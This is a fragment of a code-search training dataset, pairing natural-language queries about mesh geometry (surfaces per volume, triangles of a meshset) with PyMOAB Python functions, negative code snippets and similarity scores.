"0.5317432", "0.5317432", "0.5309065", "0.5297589", "0.529438", "0.52812845", "0.5279945", "0.5278592", "0.5276384", "0.52760696", "0.527073", "0.52688897", "0.526617", "0.5262776", "0.52577895", "0.52572966", "0.52495706", "0.5245097", "0.52390534", "0.5237486" ]
0.6084134
5
Get the number of surfaces that each volume in a given file contains inputs
def get_surfaces_per_volume(my_core, entityset_ranges): s_p_v = {} for volumeset in entityset_ranges['Volumes']: s_p_v[volumeset] = my_core.get_child_meshsets(volumeset).size() return s_p_v
{ "objective": { "self": [], "paired": [], "triplet": [ [ "query", "document", "negatives" ] ] } }
[ "def countsubcatchments(inputfilename=FileSettings.settingsdict['inputfilename']):\r\n global count\r\n with open(inputfilename, 'r') as swmmput:\r\n contents = swmmput.readlines()\r\n count = len(contents)\r\n return(count)", "def count_triangles(self, file):\n self.nibble(80)\n return struct.unpack(\"@i\", self.nibble(4))[0]", "def test_number_of_surface_objects(self):\n for O in self.mod.objts.itervalues():\n no_of_surfaces = 0\n for C in O.conts.itervalues():\n if C.surf != 0:\n no_of_surfaces += 1\n self.assertEqual(O.surfsize, no_of_surfaces)", "def count_timepoints(sc, session, files):\n tuples = zip(range(len(files)), files)\n files_sc = sc.parallelize(tuples)\n\n def count_planes(kv):\n index, path2 = kv\n try:\n from ScanImageTiffReader import ScanImageTiffReader\n img = ScanImageTiffReader(path2).data()\n except Exception:\n import tifffile\n img = tifffile.imread(path2)\n return img.shape[0]\n\n data2 = files_sc.map(count_planes).collect()\n frame_numbers = np.array(data2)\n vol_numbers = frame_numbers / len(session.fieldMask)\n return vol_numbers.astype(int)", "def total_number():\r\n total_number = 0\r\n file_read = read_file()\r\n for key in file_read:\r\n total_number = total_number + len(file_read[key])\r\n return total_number", "def countSamples(filename):\n with open(filename, \"r\") as f:\n line = f.readline().split(\"\\t\")\n return len(line) - 2", "def count(self, volume):\n\n countResult = 0\n\n for x in range(volume.shape[0]):\n for y in range(volume.shape[1]):\n for z in range(volume.shape[2]):\n if self.isMember(volume[x,y,z]):\n countResult += 1\n\n return countResult", "def get_library_sizes(args):\n with open(args.counts, \"r\") as counts:\n sizes = []\n head = True\n for line in counts:\n line = line.strip()\n if head:\n head = False\n samples = line.split(\"\\t\")[3:]\n total_counts = [0] * len(samples)\n else:\n counts = line.split(\"\\t\")\n if counts[1] == \"NA\":\n break\n else:\n counts = counts[3:]\n for i in range(len(counts)):\n total_counts[i] += int(counts[i])\n\n for i in range(len(samples)):\n sizes.append([samples[i], total_counts[i]])\n\n return sizes", "def count_cells(fpath):\n cells = []\n for i in range(40):\n fname = f\"{fpath}/Mesh2d_{i}.vtu\"\n if not os.path.exists(fname):\n print(f\"File {fname} does not exist.\")\n break\n mesh = meshio.read(fname)\n for cell_block in mesh.cells:\n if cell_block.type in (\"triangle\"):\n num_cells = len(cell_block)\n print(f\"{i:2d}: {num_cells:6d} elements, {len(mesh.points):6d} vertices\")\n cells.append(num_cells)\n continue\n return cells", "def countDataSize(self,filename):\n \n d = h5py.File(filename,'r')\n features = d['spectrometer/features'][:]\n select = self.selectData(features.astype(float), self.ifeature, d)\n N = len(features[select])\n d.close()\n\n N = (N//self.offsetLen) * self.offsetLen\n\n N = N*self.Nfeeds\n\n self.chunks += [[int(self.Nsamples), int(self.Nsamples+N)]]\n self.datasizes += [int(N/self.Nfeeds)]\n self.Nsamples += int(N)", "def read_input(filename):\n with open(filename, 'r') as f:\n (N) = map(int, next(f).split())\n def parse_line(line):\n l = line.split()\n h = 0 if l[0] == 'H' else 1\n n = int(l[1])\n return [h, l[2:]]\n\n photos = transform_strings([parse_line(line) for line in f])\n return (len(photos), photos)", "def bpCount(file):\n amount_bp = len(file)\n return amount_bp", "def compute_volume(bundle):\n\taff=np.array([[-1.25, 0, 0, 90],[0, 1.25, 0, -126],[0, 0, 1.25, -72],[0, 0, 0, 1]])\n\tvoxel_list = streamline_mapping(bundle, 
affine=aff).keys()\n\tvol_bundle = len(set(voxel_list))\n\n\treturn vol_bundle", "def countDataSize(self,filename):\n \n try:\n d = h5py.File(filename,'r')\n except:\n print(filename)\n return \n\n N = 0\n scan_edges = d['level2/Statistics/scan_edges'][:]\n for (start,end) in scan_edges:\n N += (end-start)//self.offsetLen * self.offsetLen\n d.close()\n\n N = N*self.Nfeeds\n\n self.chunks += [[int(self.Nsamples), int(self.Nsamples+N)]]\n self.datasizes += [int(N/self.Nfeeds)]\n self.Nsamples += int(N)", "def _count_data(path):\n matcher = re.compile(r'[0-9]+\\.dec')\n match = lambda name: bool(matcher.match(name))\n names = os.listdir(path)\n n_data = len(list(filter(match, names)))\n return n_data", "def fileCount(self):\n pass", "def __len__(self):\n return self._num_samples_per_file * len(self._files) // self._world_size", "def numberFiles(self):\n with open(self.inputfile) as fin:\n for n, _ in enumerate(fin, start=1): pass\n self.n = n\n return self.n", "def num_instances_mgf(infile_name):\n\tinfile = open(infile_name)\n\tnum_instances = 0\n\tfor line in infile:\n\t\tif line.startswith(\"BEGIN IONS\"):\n\t\t\tnum_instances += 1\n\treturn(num_instances)", "def voxel_count(self):\n return self.cols * self.rows * self.sections", "def get_n(self):\n return np.append([self.n_init],[s.n for s in self.surfaces])", "def get_counts(filename, alphabet, kmin, kmax):\n # get the list of kmers to count with length between kmin and kmax\n kmers_list = get_all_possible_kmers(alphabet, kmin, kmax)\n # initialyze the counter with all possible kmer with length\n # between kmin and kmax with zero counts\n counter = Counter(dict([(km, 0) for km in kmers_list]))\n # open and read in the kmers/string in the file\n with gzip.open(filename, 'rt') as fh:\n # iterates through the strings\n for line in fh:\n # make the adjustments int the strings\n kmer = line.replace('\\n', '')\n # check if kmer/string is in the counter\n if kmer in counter:\n # if kmer is in add 1 other wise keep the zero count\n counter[kmer] += 1\n return counter", "def _get_las_npoints(fpath):\n with laspy.file.File(fpath) as f:\n return f.header.count", "def n_file_elements(cls):\n \n return randint(1, (3 * Root.size))", "def getFileCount(self) -> int:\n ...", "def n_subfile(self):\n self.assert_is_dir_and_exists()\n n = 0\n for _ in self.select_file(recursive=False):\n n += 1\n return n", "def num_data_lines(filepath):\n\tif not file_exists(filepath):\n\t\treturn -1\n\tcount = 0\n\twith open(filepath, 'r') as f:\n\t\twhile read_floats(f):\n\t\t\tcount += 1\n\tf.close()\n\treturn count", "def get_amount_of_file_type_volumes(host_ip, sp_id, sd_id, image_id):\n # Build the path to the Disk's location on the file system\n volume_path = FILE_SD_VOLUME_PATH_IN_FS % (sp_id, sd_id, image_id)\n command = GET_FILE_SD_NUM_DISK_VOLUMES % volume_path\n executor = rhevm_helpers.get_host_executor(\n ip=host_ip, password=config.VDC_ROOT_PASSWORD\n )\n rc, output, err = executor.run_cmd(shlex.split(command))\n\n assert not rc, errors.CommandExecutionError(\"Output: %s\" % output)\n # There are a total of 3 files/volume, the volume metadata (.meta),\n # the volume lease (.lease) and the volume content itself (no\n # extension)\n num_volumes = int(output)/3\n logger.debug(\n \"The number of file type volumes found is '%s'\",num_volumes\n )\n return num_volumes", "def get_box_volume(solvent_file):\n box_volume = None\n file = solvent_file\n with open(file,\"rt\") as fin:\n for line in fin:\n if line[0:6] == \"CRYST1\":\n x_length = float(line[9:14])\n 
y_length = float(line[18:23])\n z_length = float(line[27:33])\n box_volume = x_length * y_length * z_length\n return(box_volume)\n return(box_volume)", "def part2(fname: dict) -> int:\n return sum(len(set.intersection(*[set(pax) for pax in group])) for group in get_data(fname))", "def get_n_polymers(filename):\r\n \r\n dmpcis_name = re.sub('dmpci', 'dmpcis', filename)\r\n\r\n with open(dmpcis_name, 'rt') as f:\r\n for line in f:\r\n if line.startswith(' # of type 1'):\r\n n_polymers = int(line.strip().split()[-1])\r\n\r\n return n_polymers", "def count_variants(filename, content=None):\n open_fn = gzip.open if is_gz_file(filename) else open\n count = 0\n with open_fn(filename, \"rt\") as ifile:\n for line in ifile:\n if not line.startswith(\"#\"):\n if content:\n if content in line:\n count += 1\n else:\n count += 1\n return count", "def fileCounter(directory):", "def Number_elements(file1,file2):\n start = time.time()\n\n verified_element = np.intersect1d(np.array(file1), np.array(file2)) \n\n print(len(verified_element))\n print(f'Duration: {time.time() - start} seconds')", "def parse_file_count(path, args):\n try:\n fisier = open(path, 'r')\n except IOError:\n print(\"Nu am putut deschide fisierul :\", path)\n return\n n_found = 0\n pattern = args.pattern\n for line in fisier:\n if args.ignore_case:\n line = line.lower()\n pattern = pattern.lower()\n n_found += line.count(pattern)\n\n fisier.close()\n return n_found", "def num_instances_msp(infile_name):\n\tinfile = open(infile_name)\n\tnum_instances = 0\n\tfor line in infile:\n\t\tif line.startswith(\"Name: \"):\n\t\t\tnum_instances += 1\n\treturn(num_instances)", "def count_aux(self, infile):\n n_aux = 0\n n_tokens = 0\n dgs_in = self._file_handler.file_to_dg_list(infile)\n for dg in dgs_in:\n n_tokens += len(dg)\n transform = VGtransformer(dg, dep_style=self._dep_style)\n transform.transform()\n n_aux += transform.tot_aux\n return n_aux, n_tokens, len(dgs_in)", "def numberFiles(self):\n return self.n", "def count_len(self):\n total = 0\n for filename in self.filenames:\n f = open(os.path.join(self.directory, filename))\n line_count = 0\n for _ in f:\n line_count += 1\n if line_count < self.window_size:\n continue\n else:\n total += line_count - self.window_size + 1\n return total", "def get_array_size():\n tg_file = 'NA_CAS_gauges.txt'\n lines = open(tg_file).readlines()\n tg_nbr = len(lines)\n return tg_nbr", "def bufcount(filename):\n\timport gzip\n\tif filename.split('.')[-1] in ['gz','gzip']: f = gzip.open(filename)\n\telse: f = open(filename)\n\tlines = 0\n\tbuf_size = 1024 * 1024\n\tread_f = f.read # loop optimization\n\t\n\tbuf = read_f(buf_size)\n\twhile buf:\n\t\tlines += buf.count('\\n')\n\t\tbuf = read_f(buf_size)\n\t\tf.close\n\treturn lines", "def n_file(self):\n self.assert_is_dir_and_exists()\n n = 0\n for _ in self.select_file(recursive=True):\n n += 1\n return n", "def get_num_instances_per_file(self, f_name):\n shape = utils_classif.get_shape(os.path.join(f_name.replace('.data', '.shape')))\n file_frames = float(shape[0])\n if self.mode_last_patch == 'discard':\n # the last patch that is always incomplete is discarded\n if self.patch_len == 25 and self.patch_hop == 13 and file_frames == 51:\n num_instances_per_file = 3\n else:\n num_instances_per_file = np.maximum(1, int(np.ceil((file_frames - self.patch_len - 1) / self.patch_hop)))\n\n elif self.mode_last_patch == 'fill':\n # the last patch that is always incomplete will be filled with zeros or signal, to avoid discarding signal\n # hence we count one more patch\n 
if self.patch_len == 25 and self.patch_hop == 13 and file_frames == 51:\n num_instances_per_file = 3\n else:\n num_instances_per_file = np.maximum(1, 1 + int(np.ceil((file_frames - self.patch_len - 1) / self.patch_hop)))\n\n return num_instances_per_file", "def get_num_instances_per_file(self, f_name):\n shape = utils_classif.get_shape(os.path.join(f_name.replace('.data', '.shape')))\n file_frames = float(shape[0])\n if self.mode_last_patch == 'discard':\n # the last patch that is always incomplete is discarded\n if self.patch_len == 25 and self.patch_hop == 13 and file_frames == 51:\n num_instances_per_file = 3\n else:\n num_instances_per_file = np.maximum(1, int(np.ceil((file_frames - self.patch_len - 1) / self.patch_hop)))\n\n elif self.mode_last_patch == 'fill':\n # the last patch that is always incomplete will be filled with zeros or signal, to avoid discarding signal\n # hence we count one more patch\n if self.patch_len == 25 and self.patch_hop == 13 and file_frames == 51:\n num_instances_per_file = 3\n else:\n num_instances_per_file = np.maximum(1, 1 + int(np.ceil((file_frames - self.patch_len - 1) / self.patch_hop)))\n\n return num_instances_per_file", "def vacabulary_size():\r\n file_read = read_file()\r\n vacabulary_list = []\r\n for key in file_read:\r\n for element in file_read[key]:\r\n if element not in vacabulary_list:\r\n vacabulary_list.append(element)\r\n return len(vacabulary_list)", "def get_num_examples(path_in):\n i = 0\n with open(path_in, 'r', encoding='utf8') as f:\n for _ in f:\n i += 1\n return i", "def get_num_vertices(triangles):\n return numpy.amax(numpy.reshape(triangles, -1)) + 1", "def main() -> None:\n lines = Lines(sys.stdin.read().splitlines())\n print(count_containers(lines))", "def get_filesize(inputfile) -> int:\n with open(inputfile, \"rb\") as f:\n lines = 0\n buf_size = 1024 * 1024\n read_f = f.raw.read\n\n buf = read_f(buf_size)\n while buf:\n lines += buf.count(b\"\\n\")\n buf = read_f(buf_size)\n\n return lines", "def linesCountingAux(file_name, nProcesses):\r\n\r\n linesPerProcessesList = []\r\n\r\n with open(file_name, \"r\") as file:\r\n lineCounting = 0\r\n\r\n for line in file:\r\n lineCounting += 1 #discover the lines in the text file\r\n\r\n linesPerProcesses = lineCounting // nProcesses\r\n\r\n for number in range(nProcesses):\r\n linesPerProcessesList.append(linesPerProcesses)\r\n if sum(linesPerProcessesList) < lineCounting:\r\n for number in range (lineCounting - sum(linesPerProcessesList)):\r\n linesPerProcessesList[number] += 1\r\n\r\n return linesPerProcessesList", "def get_number_lines(running_reward_file, running_loss_file, action_count_file):\n if Path(running_reward_file).exists():\n data = np.loadtxt(running_reward_file).reshape(-1,2)\n return data.shape[0]\n if Path(running_loss_file).exists():\n data = np.loadtxt(running_loss_file).reshape(-1,2)\n return data.shape[0]\n if Path(action_count_file).exists():\n data = np.loadtxt(action_count_file).reshape(-1,2)\n return data.shape[0]\n raise NameError(\"No files to count lines\")", "def count_number_of_reads(filename: Path) -> int:\n\tif filename.suffix == '.gz':\n\t\tcommand = f\"zcat {filename}\"\n\telse:\n\t\tcommand = f\"cat {filename}\"\n\tprocess = subprocess.Popen(command.split(), stdout = subprocess.PIPE)\n\toutput = subprocess.check_output([\"wc\", \"-l\"], stdin = process.stdout)\n\n\treads = int(output.strip()) / 4\n\treturn int(reads)", "def numverts(self):\n return self._numvertstotal", "def dimension(self):\r\n a = 0\r\n for x in self.faces():\r\n if (len(x) > 
a):\r\n a = len(x) \r\n return a-1", "def count_data_items(fileids, train=True):\n sizes = 28000 if train else 22500\n return len(fileids) * sizes", "def get_num_of_images(self):", "def n_total_files(self):\n return len(self.fileinfo)", "def size_of_variable(self, variable):\n index_structures = variable.index_structures\n if not index_structures:\n return 1\n mapping = [self.mod_index[ind].mapping for ind in index_structures]\n blocking = [self.mod_index[ind].blocking for ind in index_structures]\n size = []\n for i in range(len(mapping)):\n if mapping[i] and blocking[i]:\n length = 0\n for blk in blocking[i]:\n if blk == 0:\n length += 1\n else:\n length += blk\n size.append(length)\n else:\n return None\n return size", "def _GetSurfaceHistoryFrequencies(logs_dir):\n surfaces_count = collections.defaultdict(int)\n if not logs_dir:\n return surfaces_count\n total = 0\n last_100_invocations = sorted(os.listdir(logs_dir), reverse=True)[:100]\n for filename in last_100_invocations:\n file_path = os.path.join(logs_dir, filename)\n with files.FileReader(file_path) as log_file:\n for line in log_file:\n match = re.search(log.USED_SURFACE_PATTERN, line)\n if match:\n surface = match.group(1)\n total += 1\n surfaces_count[surface] += 1\n # normalize surface frequencies\n return {surface: count / total\n for surface, count in six.iteritems(surfaces_count)}", "def totalfiles(self):\n return len([sz for sz in self.iterate()])", "def test_volume_3d(self):\n # generate voronoi mesh \n mesh = Mesh3d(self.particles, self.bound)\n print(\"building mesh...\")\n mesh.build_geometry()\n print(\"mesh complete\")\n\n # calculate voronoi volumes of all real particles \n real_indices = self.particles[\"tag\"] == ParticleTAGS.Real\n tot_vol = np.sum(self.particles[\"volume\"][real_indices])\n\n self.assertAlmostEqual(tot_vol, 1.0)", "def countgenes():\n directory = openfile('db_directory.txt')\n no_genes_file = directory+'GENES_IN_HPO.txt'\n GENES_IN_HPO = openfile(no_genes_file)\n #GENES_IN_HPO = openfile(numbergenes_file)\n return int(GENES_IN_HPO)", "def venn_order(input_files):\n\n return len(input_files)", "def get_number_of_measurement(self):\n used_fragments = set()\n counter = 0\n for fragment in self.observed_fragments:\n num_of_isotope = 0\n used_counter = 0\n for i in self.mdv[fragment]:\n num_of_isotope = num_of_isotope + 1\n if self.mdv[fragment][i]['use'] == 'use':\n\n counter = counter + 1\n used_counter = used_counter + 1\n if num_of_isotope == used_counter:\n used_fragments.add(fragment)\n return counter-len(used_fragments)", "def __number_of_files(self):\n self.__get_files()\n return len(self.files)", "def count_class(srcfile, listfile):\n cls_list = []\n\n # open the list file\n with open(listfile, 'r') as f:\n lines = f.readlines()\n\n # check each file in the list\n for line in lines:\n xml_file = srcfile.format(line.strip())\n\n tree = ET.parse(xml_file)\n\n # objs is all the objects in the xml\n objs = tree.findall('object')\n\n # find the class name in the object, and add it to the cls list\n for ix, obj in enumerate(objs):\n cls = str(obj.find('name').text)\n cls_list.append(cls)\n\n # find the keys and sort, count the number of boxes of the keys\n if len(cls_list) > 0:\n cls_list.sort()\n import numpy as np\n cls_arr = np.array(cls_list)\n cls1 = list(set(cls_list))\n print('unsort classes is:', cls1)\n cls1.sort()\n print('sorted classes is:', cls1)\n classes = np.unique(cls_arr)\n print('the class number is:', classes.shape[0])\n print('----------------------------')\n print('the 
number of each class:')\n for i in range(0, classes.shape[0]):\n # print(classes[i], cls_list.count(classes[i]))\n print(classes[i], ':', np.where(cls_arr==classes[i])[0].shape[0])\n print('----------------------------')\n\n print('the number of all the boxes is:', len(cls_list))\n return cls_list", "def getCountFiles():\n result = 0\n session = Queries.createSession()\n try:\n result = session.execute(func.count(FileTable.id)).fetchone()[0]\n except sqlalchemy.exc.ArgumentError:\n print 'SQLAlchemy ERROR: Invalid or conflicting function argument is supplied'\n except sqlalchemy.exc.CompileError:\n print 'SQLAlchemy ERROR: Error occurs during SQL compilation'\n finally:\n session.close()\n return result", "def get_rec_count(files: List[str],\n dialect: csv.Dialect) -> Tuple[Optional[int], int]:\n rec_cnt = -1\n for _ in csv.reader(fileinput.input(files), dialect):\n rec_cnt += 1\n fileinput.close()\n return rec_cnt", "def __get_files_row_count(self, region):\r\n \r\n count = 0\r\n for file in self.__files:\r\n file_to_parse = os.path.join(self.__folder, os.path.basename(file))\r\n with zipfile.ZipFile(file_to_parse, \"r\") as zf:\r\n with zf.open(self.__get_region_filename(region), 'r') as csv_file:\r\n reader = csv.reader(TextIOWrapper(csv_file, 'windows-1250'), delimiter=';', quotechar='\"')\r\n count += sum(1 for row in reader)\r\n return count", "def countLength():\n counter = 0\n\n with open('bc.processed3.csv', 'r') as openfile:\n for line in openfile:\n counter += 1\n if counter == 1:\n print line\n\n print('Length: ', counter)", "def _get_nparts(filename,headersize,itemsize):\n return (os.path.getsize(filename)-headersize)/itemsize", "def count():", "def find_dimesion(filename):\n file = open(filename,\"r\")\n\n line = file.readline()\n file.close()\n return len(line.split())", "def get_faces_nr(self):\r\n\r\n logger.debug('Getting number of faces in each frame')\r\n\r\n if len(self.tracked_faces) == 0:\r\n\r\n # Try to load YAML file\r\n\r\n if os.path.exists(self.track_path):\r\n\r\n print 'Loading YAML file with tracking results'\r\n logger.debug('Loading YAML file with tracking results')\r\n\r\n with open(self.track_path) as f:\r\n\r\n self.tracked_faces = yaml.load(f)\r\n\r\n print 'YAML file with tracking results loaded'\r\n logger.debug('YAML file with tracking results loaded')\r\n\r\n else:\r\n\r\n print 'Warning! 
No tracking results found!'\r\n logger.warning('No tracking results found!')\r\n\r\n return\r\n\r\n self.faces_nr = {}\r\n\r\n for segment_dict in self.tracked_faces:\r\n\r\n frame_list = segment_dict[c.FRAMES_KEY]\r\n\r\n for frame_dict in frame_list:\r\n\r\n frame_name = frame_dict[c.SAVED_FRAME_NAME_KEY]\r\n\r\n if frame_name in self.faces_nr:\r\n\r\n self.faces_nr[frame_name] += 1\r\n\r\n else:\r\n\r\n self.faces_nr[frame_name] = 1\r\n\r\n # Save YAML file\r\n\r\n utils.save_YAML_file(self.faces_nr_path, self.faces_nr)", "async def get_counts_for_file(\n file_name: str,\n score: int = 0,\n par_length: int = 0,\n co_occ: int = 0,\n limit_collection: List[str] = Query([]),\n):\n limitcollection_positive, limitcollection_negative = get_collection_files_regex(\n limit_collection, get_language_from_filename(file_name)\n )\n query_graph_result = get_db().AQLQuery(\n query=main_queries.QUERY_TOTAL_NUMBERS,\n batchSize=100000,\n bindVars={\n \"filename\": file_name,\n \"score\": score,\n \"parlength\": par_length,\n \"coocc\": co_occ,\n \"limitcollection_positive\": limitcollection_positive,\n \"limitcollection_negative\": limitcollection_negative,\n },\n )\n return {\"parallel_count\": query_graph_result.result[0]}", "def estimate_volume(self):\n volume = 0.\n zvals = np.unique([c.image_z_position for c in self.contours])\n\n # We pad a zval on the bottom that is the same distance from the\n # first zval to the second zval but below the first point. We do \n # the same thing for the top zval.\n if len(self.contours) != 1:\n zlow = zvals[ 0] - (zvals[1]-zvals[0])\n zhigh = zvals[-1] + (zvals[-1]-zvals[-2])\n zvals = np.r_[zlow, zvals, zhigh]\n else:\n zvals = None\n\n for i,contour in enumerate(self.contours):\n contour_array = contour.to_matrix() * self.scan.pixel_spacing\n x = contour_array[:,0]\n y = contour_array[:,1]\n # \"Shoelace\" formula for area.\n area = 0.5*np.abs(np.dot(x,np.roll(y,1))-np.dot(y,np.roll(x,1)))\n \n if zvals is not None:\n j = np.argmin(np.abs(contour.image_z_position-zvals))\n spacing_z = 0.5*(zvals[j+1]-zvals[j-1])\n else:\n spacing_z = self.scan.slice_thickness\n\n volume += (1. if contour.inclusion else -1.) 
* area * spacing_z\n return volume", "def count_examples(filepaths):\n n = 0\n for f in filepaths:\n for r in tf.python_io.tf_record_iterator(f):\n n += 1\n return n", "def get_dataset_length(file_path, had_header=True):\n with open(file_path, 'r') as f:\n length = 0\n for _ in f:\n length += 1\n length = length - had_header\n return length", "def approximate_volume(pdb_filenames, n_molecules_list, box_scaleup_factor=2.0):\n volume = 0.0 # in cubic angstroms\n for k, (pdb_file) in enumerate(pdb_filenames):\n molecule_volume = 0.0\n molecule_trj = md.load(pdb_filenames[k])\n for atom in molecule_trj.topology.atoms:\n if atom.element.symbol == 'H':\n molecule_volume += 5.0 # approximated from bondi radius = 1.06 angstroms\n else:\n molecule_volume += 15.0 # approximated from bondi radius of carbon = 1.53 angstroms\n volume += molecule_volume * n_molecules_list[k]\n box_size = volume**(1.0/3.0) * box_scaleup_factor\n return box_size", "def pre_process_file(filename):\n\n num_lines = 0\n vm_ids = set()\n with open(filename) as trace:\n for item in csv.reader(trace, delimiter=','):\n num_lines += 1\n disk_id = int(item[2])\n vm_ids.add(disk_id) # can make it more efficient\n no_of_vms = len(vm_ids)\n return (num_lines, no_of_vms, vm_ids)", "def get_triangles_per_surface(my_core, entity_ranges):\n\n t_p_s = {}\n for surface in entity_ranges['Surfaces']:\n t_p_s[surface] = my_core.get_entities_by_type(\n surface, types.MBTRI).size()\n return t_p_s", "def count_data(path):\n matcher = re.compile(r'[0-9]+\\.json')\n match = lambda name: bool(matcher.match(name))\n names = os.listdir(path)\n n_data = len(list(filter(match, names)))\n return n_data", "def length(analog_file):\n if analog_file[-10:] == 'analog.brw':\n with h5py.File(analog_file, 'r') as file:\n print(len(file[\"3BData\"][\"Raw\"]))\n else:\n raise NotImplementedError(\"Only for use with *analog.brw files\")", "def findFLength(filename):\n f = os.popen('wc -l < {}'.format(filename))\n return int(f.read())", "def load_nifty_volume_as_array(filename):\n img = sitk.ReadImage(filename)\n img_arr = sitk.GetArrayFromImage(img)\n return img_arr", "def contig_count(contig):\n return sum([1 for line in open(contig, 'rU').readlines() if line.startswith('>')])", "def _setup_n_ints_in_file(self):\n self.n_ints_in_file = sigproc.calc_n_ints_in_file(self.filename)", "def n_facets(self):\n return self.n_inequalities()", "def get_inf_sizes(song_or_key):\n if isinstance(song_or_key, basestring):\n k = song_or_key\n else:\n k = song_key(song_or_key)\n path = os.path.join(LYRICS_DIR, k+'.txt.gz.infgen')\n with open(path) as f:\n return parse_infgen.parse_ratio(f)", "def countComponents26(cube):\n n,l = labelComponents26(cube);\n return n;", "def _calculate_volume(image: sitk.Image) -> float:\n\n voxel_volume = np.prod(image.GetSpacing())\n number_of_voxels = sitk.GetArrayFromImage(image).sum()\n\n return number_of_voxels * voxel_volume", "def get_col_count(files: List[str],\n dialect: csv.Dialect) -> int:\n for record in csv.reader(fileinput.input(files[0]), dialect):\n field_cnt = len(record) -1\n break\n fileinput.close()\n return field_cnt", "def num_cuboids(self):\n return self._shape_count(_sff.cuboid)", "def volume_polyhedron(polyhedron):\n V = 0\n for fkey in polyhedron.face:\n vertices = polyhedron.face_vertices(fkey, ordered=True)\n if len(vertices) == 3:\n faces = [vertices]\n else:\n faces = []\n for i in range(1, len(vertices) - 1):\n faces.append(vertices[0:1] + vertices[i:i + 2])\n for face in faces:\n a = 
polyhedron.vertex_coordinates(face[0])\n b = polyhedron.vertex_coordinates(face[1])\n c = polyhedron.vertex_coordinates(face[2])\n ab = subtract_vectors(b, a)\n ac = subtract_vectors(c, a)\n n = cross_vectors(ab, ac)\n V += dot_vectors(a, n)\n return V / 6.", "def surface_samples(self):\n if self._surface_samples is None:\n self._surface_samples = self.get_surface_samples(10000)\n return self._surface_samples", "def calHet( inFile, varType ):\n names = []\n print(\"Sample\\tfracHet\\thetCt\\thomCt\") # print header\n \n with open( inFile, 'r') as files: # open sample name file\n for i in files:\n i = i.rstrip()\n vcf = i + \".\" + varType + \".vcf\" \n with open( vcf, 'r' ) as data:\n hom = 0.0 # count homozygous sites\n het = 0.0 # count heterozygous sites\n fractionHet = 0.0 # fraction heterozygous\n \n for var in data:\n if var.startswith(\"#\"): # skip header\n continue\n else: \n var = var.rstrip()\n line = var.split(\"\\t\")\n stats = line[9].split(':') # \n alleles = list( map( int, stats[1].split(',') ) ) # create list of allele counts\n check = [ i for i in alleles if i > 0] # put any counts > 0 into a list\n if not check: # if all allele counts == 0\n continue # all alleles are set to zero wtf? Result of a quality score that is low.\n elif len(check) > 1: # multiple allele counts , must be heterozygous\n het += 1 # more than one allele \n elif len(check) == 1: # only one allele has a count\n hom += 1\n #print(\"%s\\t%s\\t%s\\t%s\\t%s\\t%s\" %(i, line[0], line[1], stats[0], stats[1], check ) ) \n if hom == 0:\n fractionHet = 100\n else:\n fractionHet = het/(hom + het) # calculate fraction heterozygous\n print(\"%s\\t%f\\t%f\\t%f\" %(i, fractionHet, het,hom )) \n \n files.close()", "def dimensions():", "def process_spacecraft(spacecraft_file_abspath):\n\n total_fuel = 0\n with open(spacecraft_file_abspath, 'r') as f:\n for mass in f.readlines():\n total_fuel += process_module_mass(int(mass))\n\n return total_fuel", "def get_file_counts(filename):\n new_file = open(filename, \"r\")\n d = dict()\n for line in new_file: \n split_line = line.split()\n for word in split_line:\n if word in d:\n d[word] += 1\n else:\n d[word] = 1\n new_file.close()\n return d", "def count_variants(vcf_list, sample_list):\n\n df_lst = []\n\n sample_vcf_dct = dict(zip(sample_list,vcf_list))\n\n for s in sample_vcf_dct.keys():\n\n vcf_in = sample_vcf_dct[s]\n vcf = VariantFile(vcf_in)\n\n snv = 0\n indel = 0\n\n for rec in vcf:\n\n ref_len = len(rec.ref)\n\n for a in rec.alts:\n if len(a) > 1 or ref_len > 1:\n indel +=1\n else:\n snv +=1\n\n df_lst.append([s,snv,indel])\n\n out_df = pd.DataFrame(df_lst, columns=['sample','snvs','indels'])\n\n return out_df" ]
[ "0.62458247", "0.6179542", "0.61321104", "0.59735066", "0.5963068", "0.5940635", "0.5933851", "0.58621955", "0.5853695", "0.58389825", "0.5696593", "0.569234", "0.56829655", "0.5678511", "0.56699306", "0.5660936", "0.5654335", "0.5653217", "0.5644729", "0.56445545", "0.5624782", "0.56085867", "0.56084555", "0.5599541", "0.5564642", "0.55617267", "0.55422044", "0.55343777", "0.5524653", "0.5520196", "0.551315", "0.55068284", "0.55026144", "0.5486285", "0.5482118", "0.5459388", "0.545895", "0.5457493", "0.5451079", "0.54353434", "0.5433203", "0.5432739", "0.5421109", "0.5421109", "0.5399715", "0.5379659", "0.5377716", "0.5376754", "0.53606784", "0.53570503", "0.5342393", "0.53378296", "0.5327593", "0.5320841", "0.53202665", "0.5314768", "0.531239", "0.5311997", "0.5308972", "0.5304375", "0.53042835", "0.53027344", "0.52854335", "0.5284771", "0.5262586", "0.5261372", "0.5259589", "0.52540535", "0.52510387", "0.5243612", "0.5242551", "0.5231812", "0.5227791", "0.5219812", "0.5218493", "0.5211845", "0.52090347", "0.5206607", "0.51979345", "0.51968616", "0.51930004", "0.51918036", "0.51873386", "0.51835054", "0.5181803", "0.5181445", "0.51804566", "0.5179529", "0.5179037", "0.517786", "0.5176554", "0.5175884", "0.5174625", "0.51714164", "0.51709944", "0.5165327", "0.5163799", "0.51616555", "0.5154753", "0.51538765" ]
0.613363
2
Get triangles of a volume if geom_dim is 3 Get triangles of a surface if geom_dim is 2 Else get all the triangles inputs
def get_tris(my_core, meshset, geom_dim): # get triangles of a volume if my_core.tag_get_data(geom_dim, meshset)[0][0] == 3: entities = my_core.create_meshset() for surface in my_core.get_child_meshsets(meshset): my_core.add_entities(entities, my_core.get_entities_by_type(surface, types.MBTRI)) tris = my_core.get_entities_by_type(entities, types.MBTRI) # get triangles of a surface elif my_core.tag_get_data(geom_dim, meshset)[0][0] == 2: entities = my_core.create_meshset() my_core.add_entities(entities, my_core.get_entities_by_type(meshset, types.MBTRI)) tris = my_core.get_entities_by_type(entities, types.MBTRI) else: # get all the triangles tris = my_core.get_entities_by_type(meshset, types.MBTRI) return tris
{ "objective": { "self": [], "paired": [], "triplet": [ [ "query", "document", "negatives" ] ] } }
